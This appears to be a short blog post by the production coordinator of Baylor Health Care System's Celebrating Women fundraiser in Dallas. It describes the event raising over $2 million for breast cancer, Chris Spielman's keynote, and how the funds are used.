Since 2008, I have been honored to be the Production Coordinator for the Baylor Health Care System's Celebrating Women Event. The event was held at the Hilton Anatole in Dallas on October 23rd. This year was truly memorable because we raised over $2 million dollars to help the fight against breast cancer. This year’s keynote speaker was former #NFL player Chris Spielman, who lost his wife to breast cancer in 2009. He spoke about his struggles and explained how he continues to promote increasing awareness about the disease. He aims to share his experience and carry on his wife’s legacy, hoping they will find a cure.
Did you know someone is diagnosed with breast cancer every 4 hours, just in the DFW area? Baylor Health Care System created Celebrating Women back in 2000 because they treat breast cancer more than any other type of cancer! All of the funds from Celebrating Women have contributed to four main areas: capital & technology, medical education, patient center programs, and above all, research. A majority of the proceeds go to Celebrating Women, fighting against breast cancer.
